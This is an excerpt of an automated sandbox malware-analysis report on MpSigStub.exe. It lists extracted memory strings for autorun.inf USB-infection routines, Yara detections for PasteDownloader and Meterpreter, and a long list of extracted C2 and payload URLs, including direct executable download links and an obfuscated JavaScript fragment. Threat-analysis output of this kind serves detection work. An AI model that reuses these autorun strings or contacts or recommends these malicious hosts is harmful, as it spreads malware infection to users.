Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	Binary or memory string: autorun.inf4++
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: c:\windows\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	Binary or memory string: %c:\AUTORUN.INF
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: M:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: ?atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: [autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: 6[autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: c:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	Binary or memory string: ;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	Binary or memory string: t;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: [autorun]action=openshellexecute=
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: 0AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: 0[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: \sysautorun.inf
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: \sysautorun.inf]
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: S[autorun]
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: E[autorun]
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: G[autorun]
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\explore\command=
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: D:\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: `[autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: \autorun.inf\
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: .*if"%1"=="+"attrib+s+a+h+r%2\autorun.inf:end
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: line1 = "[autorun]" && line2 = "open = System\DriveGuard\DriveProtect.exe -run
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: *filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: %s:\AutoRun.inf

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\

Networking:

Yara detected PasteDownloader

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://batrasiaku.blogspot.com/
Source: Malware configuration extractor	URLs: http://%s/files/
Source: Malware configuration extractor	URLs: http://u.to/PbrTEg
Source: Malware configuration extractor	URLs: http://%s:%i%s
Source: Malware configuration extractor	URLs: http://www.goldwindos2000.com/krratwo/hker.htm
Source: Malware configuration extractor	URLs: http://www.bluelook.es/bvvtbbh.php
Source: Malware configuration extractor	URLs: http://instituthypnos.com/maps1316/ki_d/
Source: Malware configuration extractor	URLs: http://cs.zhongsou.com/
Source: Malware configuration extractor	URLs: http://203.199.200.61
Source: Malware configuration extractor	URLs: http://31.192.209.
Source: Malware configuration extractor	URLs: http://92.222.7.
Source: Malware configuration extractor	URLs: http://animefrase.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
Source: Malware configuration extractor	URLs: http://46.101.202.232/wp-includes/mx_ib/
Source: Malware configuration extractor	URLs: http://worm.ws
Source: Malware configuration extractor	URLs: http://bonkersmen.blogspot.com/
Source: Malware configuration extractor	URLs: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: Malware configuration extractor	URLs: http://110.42.4.180:
Source: Malware configuration extractor	URLs: http://3dplayful.blogspot.com/
Source: Malware configuration extractor	URLs: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: Malware configuration extractor	URLs: http://www.trotux.com/?z=
Source: Malware configuration extractor	URLs: http://cts.hotbar.com/trackedevent.aspx
Source: Malware configuration extractor	URLs: http://www.3322.org/dyndns/getip
Source: Malware configuration extractor	URLs: http://%s%simg.jpg
Source: Malware configuration extractor	URLs: http://8nasrcity.blogspot.com/
Source: Malware configuration extractor	URLs: http://cicahroti.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.norton-kaspersky.com/trf/tools
Source: Malware configuration extractor	URLs: http://www.xpassgenerator.com/software/d
Source: Malware configuration extractor	URLs: http://3dcpw.net/house/404.htm
Source: Malware configuration extractor	URLs: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor	URLs: http://tool.world2.cn/toolbar/
Source: Malware configuration extractor	URLs: http://72.29.80.113/~nossacai/
Source: Malware configuration extractor	URLs: http://scud.pipis.net/
Source: Malware configuration extractor	URLs: http://best4hack.blogspot.com/
Source: Malware configuration extractor	URLs: http://update.7h4uk.com:443/antivirus.php
Source: Malware configuration extractor	URLs: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: Malware configuration extractor	URLs: http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg
Source: Malware configuration extractor	URLs: http://greenertrack.info/.well-known/acme-challenge/hp.gf
Source: Malware configuration extractor	URLs: http://goatse.ragingfist.net/
Source: Malware configuration extractor	URLs: http://citw-vol2.blogspot.com/
Source: Malware configuration extractor	URLs: http://%s:%d/PUT[%s]/FC001/%s
Source: Malware configuration extractor	URLs: http://oo.shmtb.info:888/phone.exe\soft
Source: Malware configuration extractor	URLs: http://32player.com
Source: Malware configuration extractor	URLs: http://31.192.211.
Source: Malware configuration extractor	URLs: http://200.159.128.
Source: Malware configuration extractor	URLs: http://www.klikspaandelft.nl/
Source: Malware configuration extractor	URLs: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: Malware configuration extractor	URLs: http://march262020.club/files/
Source: Malware configuration extractor	URLs: http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car
Source: Malware configuration extractor	URLs: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: Malware configuration extractor	URLs: http://nownowsales.com/wp-admin/ulpbz/
Source: Malware configuration extractor	URLs: http://errors.statsmyapp.com
Source: Malware configuration extractor	URLs: http://metznr.co/tor/index.php
Source: Malware configuration extractor	URLs: http://w.woc4b.com
Source: Malware configuration extractor	URLs: http://spotdewasa.blogspot.com/
Source: Malware configuration extractor	URLs: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: Malware configuration extractor	URLs: http://dudethisishowwedoitallnightlong.2myip.net
Source: Malware configuration extractor	URLs: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
Source: Malware configuration extractor	URLs: http://down.admin7a57a5a743894a0e.club/4.exe
Source: Malware configuration extractor	URLs: http://downloadfilesldr.com/index2.php?adv=141
Source: Malware configuration extractor	URLs: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: Malware configuration extractor	URLs: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: Malware configuration extractor	URLs: http://articlunik.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.webflora.co.kr/slog/skin/setup.ini
Source: Malware configuration extractor	URLs: http://%domain%/config.php
Source: Malware configuration extractor	URLs: http://pig.zhongsou.com/helpsimple/help.htm
Source: Malware configuration extractor	URLs: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: Malware configuration extractor	URLs: http://%s?u=%s&m=%s&action=find
Source: Malware configuration extractor	URLs: http://www.jplineage.com/firo/mail.asp?tomail=163@163.com&mailbody=
Source: Malware configuration extractor	URLs: http://update.xiaoshoupeixun.com/tsbho.ini
Source: Malware configuration extractor	URLs: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: Malware configuration extractor	URLs: http://march262020.com/files/
Source: Malware configuration extractor	URLs: http://aspeja.org/question/
Source: Malware configuration extractor	URLs: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: Malware configuration extractor	URLs: http://www.pornpassmanager.com/d
Source: Malware configuration extractor	URLs: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor	URLs: http://www.sqwire.com
Source: Malware configuration extractor	URLs: http://interface.kokmobi.com/newservice
Source: Malware configuration extractor	URLs: http://ios-update-whatsapp.com
Source: Malware configuration extractor	URLs: http://nfinx.info
Source: Malware configuration extractor	URLs: http://arifkacip.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.google.com.br
Source: Malware configuration extractor	URLs: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: Malware configuration extractor	URLs: http://aindonashi.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.direct-ip.com/
Source: Malware configuration extractor	URLs: http://%s:%d/%d%s
Source: Malware configuration extractor	URLs: http://voguextra.com
Source: Malware configuration extractor	URLs: http://autothich.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com"target="_blank
Source: Malware configuration extractor	URLs: http://so1.5k5.net/interface?action=install&p=
Source: Malware configuration extractor	URLs: http://www.zixzelz1.narod.ru/
Source: Malware configuration extractor	URLs: http://a.pomf.cat/
Source: Malware configuration extractor	URLs: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor	URLs: http://www.CollakeSoftware.com
Source: Malware configuration extractor	URLs: http://%s:%i%s?mod=cmd
Source: Malware configuration extractor	URLs: http://www.2345.com
Source: Malware configuration extractor	URLs: http://wevx.xyz/post.php?uid=
Source: Malware configuration extractor	URLs: http://tempuri.org/
Source: Malware configuration extractor	URLs: http://104.236.94.
Source: Malware configuration extractor	URLs: http://santasalete.sp.gov.br/jss/
Source: Malware configuration extractor	URLs: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw
Source: Malware configuration extractor	URLs: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: Malware configuration extractor	URLs: http://hostthenpost.org/uploads/
Source: Malware configuration extractor	URLs: http://179.43.158.187/PhtJFr0fvBk2.php
Source: Malware configuration extractor	URLs: http://twitck.com
Source: Malware configuration extractor	URLs: http://allankhall.com/templates/beez3/language/en-gb/msg.jpg
Source: Malware configuration extractor	URLs: http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg
Source: Malware configuration extractor	URLs: http://aancyber77.blogspot.com/
Source: Malware configuration extractor	URLs: http://berkah2013.blogspot.com/
Source: Malware configuration extractor	URLs: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: Malware configuration extractor	URLs: http://%s/any2/%s-direct.ex
Source: Malware configuration extractor	URLs: http://www.w3.org/1999/xsl/transform
Source: Malware configuration extractor	URLs: http://code.google.com/p/b374k-shell*/$s_pass=
Source: Malware configuration extractor	URLs: http://i.compucrush.com/i.php
Source: Malware configuration extractor	URLs: http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d
Source: Malware configuration extractor	URLs: http://funsiteshere.com/redir.php
Source: Malware configuration extractor	URLs: http://95.173.183.
Source: Malware configuration extractor	URLs: http://mydirecttube.com/
Source: Malware configuration extractor	URLs: http://cvfanatic.blogspot.com/
Source: Malware configuration extractor	URLs: http://zz.8282.space/nw/ss/
Source: Malware configuration extractor	URLs: http://50.63.128.
Source: Malware configuration extractor	URLs: http://www.niudoudou.com/web/download/
Source: Malware configuration extractor	URLs: http://dl.dropbox.com/u/
Source: Malware configuration extractor	URLs: http://bloodybits.com/edwinjefferson.com/ie_xo/
Source: Malware configuration extractor	URLs: http://vidquick.info/cgi/
Source: Malware configuration extractor	URLs: http://178.128.115.182/wp-includes/3_y/
Source: Malware configuration extractor	URLs: http://xn--
Source: Malware configuration extractor	URLs: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: Malware configuration extractor	URLs: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: Malware configuration extractor	URLs: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: Malware configuration extractor	URLs: http://tinyurl.com/
Source: Malware configuration extractor	URLs: http://ow.ly/QoHbJ
Source: Malware configuration extractor	URLs: http://khaleejposts.com/rgk/m_rs/
Source: Malware configuration extractor	URLs: http://fateh.aba.ae/xyzx.zip
Source: Malware configuration extractor	URLs: http://tsrv1.ws
Source: Malware configuration extractor	URLs: http://directplugin.com/dialers/
Source: Malware configuration extractor	URLs: http://tak-tik.site/crun20.gif
Source: Malware configuration extractor	URLs: http://www.youndoo.com/?z=
Source: Malware configuration extractor	URLs: http://w.w3c4f.com
Source: Malware configuration extractor	URLs: http://count.key5188.com/vip/get.asp?mac=
Source: Malware configuration extractor	URLs: http://ms365box.com/update.1
Source: Malware configuration extractor	URLs: http://5starvideos.com/main/
Source: Malware configuration extractor	URLs: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: Malware configuration extractor	URLs: http://www.22teens.com/
Source: Malware configuration extractor	URLs: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: Malware configuration extractor	URLs: http://downloadfilesldr.com/index5.php?adv=141
Source: Malware configuration extractor	URLs: http://downloadfilesldr.com/index3.php?adv=141
Source: Malware configuration extractor	URLs: http://server00.send6.com/1abf8588/oluwa.exe
Source: Malware configuration extractor	URLs: http://www.microsoft.com0
Source: Malware configuration extractor	URLs: http://evanstechnology.com
Source: Malware configuration extractor	URLs: http://3.0.242.71/wp-content/2_ur/
Source: Malware configuration extractor	URLs: http://sf3q2wrq34.ddns.net
Source: Malware configuration extractor	URLs: http://suckjerkcock.date
Source: Malware configuration extractor	URLs: http://download.zhongsou.com/cdsearch/
Source: Malware configuration extractor	URLs: http://20vp.cn/moyu/
Source: Malware configuration extractor	URLs: http://vequiato.sites.uol.com.br/
Source: Malware configuration extractor	URLs: http://gveejlsffxmfjlswjmfm.com/files/
Source: Malware configuration extractor	URLs: http://localhost:62338/Chipsetsync.asmx
Source: Malware configuration extractor	URLs: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%@&yy=%s
Source: Malware configuration extractor	URLs: http://adaptservices.net/qwao8cj4gkogu
Source: Malware configuration extractor	URLs: http://hytechmart.com
Source: Malware configuration extractor	URLs: http://www.al-enayah.com/ssfm
Source: Malware configuration extractor	URLs: http://downloadfilesldr.com/allfile.jpg
Source: Malware configuration extractor	URLs: http://spywaresoftstop.com/download/141/setup.exe
Source: Malware configuration extractor	URLs: http://bogle.com';/varstr='javascript';str=rrr;l=str.length;while(ccc<=str.length-1){/dfkjhsjkdfhgkjhioewqpoasncad;/svs=svm.charat(scnt%7+55);svs=svm.charat(scnt%7);ccc=ccc+6-2-4;/eiofybajdhaasdhflaeuadsjkhf/while(str.charat(ccc)!=svs){temp=temp+str.charat(ccc++);/sdfaopekdlsnvasdjfpoewsdjaskdjf/}scnt++;/kdfljgoerijklasdfjkasdkjfhasdhkfj/ccc++;ccc--;ccc++;if(ccc!=(ccc+3))out=out+string.fromcharcode(((parseint(temp,16)-1)));elsealert('error');ccc=2ccc-ccc
Source: Malware configuration extractor	URLs: http://ip-api.com/json/
Source: Malware configuration extractor	URLs: http://www.
Source: Malware configuration extractor	URLs: http://fortisdesigns.com/5ox6oyzzslcp
Source: Malware configuration extractor	URLs: http://bigboobsp.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.zhongsou.com/kefu/zskf.htm
Source: Malware configuration extractor	URLs: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: Malware configuration extractor	URLs: http://coltaddict.blogspot.com/
Source: Malware configuration extractor	URLs: http://%domain%/update.php
Source: Malware configuration extractor	URLs: http://chemgioaz.blogspot.com/
Source: Malware configuration extractor	URLs: http://arthisoft.blogspot.com/
Source: Malware configuration extractor	URLs: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: Malware configuration extractor	URLs: http://lo0oading.blogspot.com/
Source: Malware configuration extractor	URLs: http://checkip.dyndns.org/
Source: Malware configuration extractor	URLs: http://pages
Source: Malware configuration extractor	URLs: http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg
Source: Malware configuration extractor	URLs: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
Source: Malware configuration extractor	URLs: http://seuufhehfueughek.ws/
Source: Malware configuration extractor	URLs: http://%s%s?search=%s
Source: Malware configuration extractor	URLs: http://2010-kpss.blogspot.com/
Source: Malware configuration extractor	URLs: http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq
Source: Malware configuration extractor	URLs: http://www.thon-samson.be/js/_notes/
Source: Malware configuration extractor	URLs: http://babukq4e2p4wu4iq.onion
Source: Malware configuration extractor	URLs: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: Malware configuration extractor	URLs: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: Malware configuration extractor	URLs: http://techwach.com
Source: Malware configuration extractor	URLs: http://www.ip2location.com/
Source: Malware configuration extractor	URLs: http://fateh.aba.ae/abc.zip
Source: Malware configuration extractor	URLs: http://ankarahurdacim.com/wp-admin/3yk1/
Source: Malware configuration extractor	URLs: http://208.95.104.
Source: Malware configuration extractor	URLs: http://wmwifbajxxbcxmucxmlc.com/files/
Source: Malware configuration extractor	URLs: http://michiganpppp.com/work/doc/9.doc
Source: Malware configuration extractor	URLs: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname
Source: Malware configuration extractor	URLs: http://te.platrium.com/pte.aspx
Source: Malware configuration extractor	URLs: http://cl.1ck.me/
Source: Malware configuration extractor	URLs: http://hotedeals.co.uk/ekck095032/
Source: Malware configuration extractor	URLs: http://scrollayer.com
Source: Malware configuration extractor	URLs: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: Malware configuration extractor	URLs: http://www.hasandanalioglu.com/wp-content/n_v/
Source: Malware configuration extractor	URLs: http://agressor58.blogspot.com/
Source: Malware configuration extractor	URLs: http://batysnewskz.kz/ups.com
Source: Malware configuration extractor	URLs: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: Malware configuration extractor	URLs: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: Malware configuration extractor	URLs: http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg
Source: Malware configuration extractor	URLs: http://1bestgate.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.sacbarao.kinghost.net/
Source: Malware configuration extractor	URLs: http://spy-kill.com/bho_adult.txt
Source: Malware configuration extractor	URLs: http://gosgd2.com
Source: Malware configuration extractor	URLs: http://gg
Source: Malware configuration extractor	URLs: http://whatami.us.to/tc
Source: Malware configuration extractor	URLs: http://www.g00gleadserver.com/list.txt
Source: Malware configuration extractor	URLs: http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg
Source: Malware configuration extractor	URLs: http://maplestory.nexon.com
Source: Malware configuration extractor	URLs: http://181.174.166.137/sys/f4.exe
Source: Malware configuration extractor	URLs: http://%s:%d/FC001/%s
Source: Malware configuration extractor	URLs: http://www.agendagyn.com/media/fotos/2010/
Source: Malware configuration extractor	URLs: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
Source: Malware configuration extractor	URLs: http://209.141.35.239/33/
Source: Malware configuration extractor	URLs: http://worm.ws/
Source: Malware configuration extractor	URLs: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: Malware configuration extractor	URLs: http://tumicy.com/plqijcndwoisdhsaow/
Source: Malware configuration extractor	URLs: http://megatoolbar.net/inetcreative/
Source: Malware configuration extractor	URLs: http://microsoft.erlivia.ltd/jikolo.doc
Source: Malware configuration extractor	URLs: http://ahmad-roni.blogspot.com/
Source: Malware configuration extractor	URLs: http://gaigoixxx.blogspot.com/
Source: Malware configuration extractor	URLs: http://www.preyer.it/ups.com/
Source: Malware configuration extractor	URLs: http://bln8225.casacam.net/zxqjhjubakff/
Source: Malware configuration extractor	URLs: http://31.192.210.
Source: Malware configuration extractor	URLs: http://bittupadam.blogspot.com/
Source: Malware configuration extractor	URLs: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&dyfm=cpjyicit
Source: Malware configuration extractor	URLs: http://vod.7ibt.com/index.php?url=
Source: Malware configuration extractor	URLs: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: Malware configuration extractor	URLs: http://200.98.
Source: Malware configuration extractor	URLs: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: Malware configuration extractor	URLs: http://srmvx.com.br/uploads/
Source: Malware configuration extractor	URLs: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: Malware configuration extractor	URLs: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: Malware configuration extractor	URLs: http://referfile.com
Source: Malware configuration extractor	URLs: http://dimas.stifar.ac.id/vjrzzufsu/
Source: Malware configuration extractor	URLs: http://afkar.today/test_coming.training/w_f/
Source: Malware configuration extractor	URLs: http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee
Source: Malware configuration extractor	URLs: http://muacangua.com/wp-admin/o_n/
Source: Malware configuration extractor	URLs: http://(www\|corail)\\.sudoc
Source: Malware configuration extractor	URLs: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: Malware configuration extractor	URLs: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: Malware configuration extractor	URLs: http://fu.o3sb.com:9999/img.jpg
Source: Malware configuration extractor	URLs: http://abeidaman.blogspot.com/
Source: Malware configuration extractor	URLs: http://aitimatafb.blogspot.com/
Source: Malware configuration extractor	URLs: http://microhelptech.com/gotoassist/
Source: Malware configuration extractor	URLs: http://www.wuweixian.com/we_down/k2_v/
Source: Malware configuration extractor	URLs: http://94.103.85.236/ds/11.gif
Source: Malware configuration extractor	URLs: http://wpitcher.com
Source: Malware configuration extractor	URLs: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
Source: Malware configuration extractor	URLs: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: Malware configuration extractor	URLs: http://5starvideos.com/main/K
Source: Malware configuration extractor	URLs: http://claus-wieben.de/sdor1om4hl5naz
Source: Malware configuration extractor	URLs: http://nevergreen.net/456
Source: Malware configuration extractor	URLs: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: Malware configuration extractor	URLs: http://hiltrox.com
Source: Malware configuration extractor	URLs: http://jiaozhu
Source: Malware configuration extractor	URLs: http://acayipbiri.blogspot.com/
Source: Malware configuration extractor	URLs: http://aolopdephn.blogspot.com/
Source: Malware configuration extractor	URLs: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: Malware configuration extractor	URLs: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: Malware configuration extractor	URLs: http://freeunweb.pro/FreeUnWeb.exe
Source: Malware configuration extractor	URLs: http://81.177.26.20/ayayay
Source: Malware configuration extractor	URLs: http://www.getip.pw
Source: Malware configuration extractor	URLs: http://61.19.253.
Source: Malware configuration extractor	URLs: http://dqbdesign.com/wp-admin/cu_sa/
Source: Malware configuration extractor	URLs: http://faithhotelghana.com
Source: Malware configuration extractor	URLs: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: Malware configuration extractor	URLs: http://downloadfilesldr.com/index4.php?adv=141
Source: Malware configuration extractor	URLs: http://alhalm-now.blogspot.com/
Source: Malware configuration extractor	URLs: http://62.210.214.
Source: Malware configuration extractor	URLs: http://dmww.dmcast.com/script/update.asp?version=%s
Source: Malware configuration extractor	URLs: http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu
Source: Malware configuration extractor	URLs: http://appswonder.info
Source: Malware configuration extractor	URLs: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: Malware configuration extractor	URLs: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: Malware configuration extractor	URLs: http://18.130.111.206/wp/x_y/
Source: Malware configuration extractor	URLs: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: Malware configuration extractor	URLs: http://dontkillme/
Source: Malware configuration extractor	URLs: http://www.diannaowang.com:8080
Source: Malware configuration extractor	URLs: http://www.friskypotato.com/
